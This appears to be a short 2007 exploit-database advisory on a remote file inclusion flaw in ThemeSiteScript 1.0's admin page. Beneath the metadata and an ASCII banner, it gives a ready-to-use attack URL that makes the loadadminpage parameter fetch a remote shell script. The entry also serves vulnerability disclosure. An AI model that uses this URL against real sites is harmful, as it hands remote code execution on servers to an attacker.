ThemeSiteScript 1.0 - 'index.php?loadadminpage' Remote File Inclusion

Author: Koller
type: webapps
platform: php
port: 
date_added: 2007-12-23 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

#    .__                                          __.
#    NN)    NNNN   JNNN` NNNN.   NNN NNNNNNNNNNN  NN)
#    NN)    `NNN).NNNF  .NNNNN  (NN) """4NNN"""`  NN)
#    NN)     (NNNNNN`   (NNNNN) NNN     (NNN      NN)
#    NN)      4NNNN`    NNN(NNN.NNF     NNN)      NN)
#    NN)     JNNNNL    (NN) NNNNNN)    (NNN       NN)
#    NN)    JNNNNNN)   JNN` `NNNNN     JNNF       NN)
#    NN)  .NNNF (NNN.  NNN   4NNN)     NNN)       NN)
#    NN) JNNN`   NNNN (NN)    NNN`    (NNN        NN)
#    NN)                                          NN)
#    .__           http://xaker.name              __.
#
#
# script name      : ThemeSiteScript 1.0
# GoogLe Dork      : none
# Of. site         : http://agaresmedia.com
# The price        : $32.99
# Risk             : Medium
# Found By         : Koller
# Thanks           : all members xaker.name & grabberz.com
# Vulnerable files : /admin/index.php

# Vuln : www.victim.com/admin/index.php?loadadminpage=http://localhost/shell.txt?

# Contact: K0ller (at) hotmail (dot) CoM

# milw0rm.com [2007-12-24]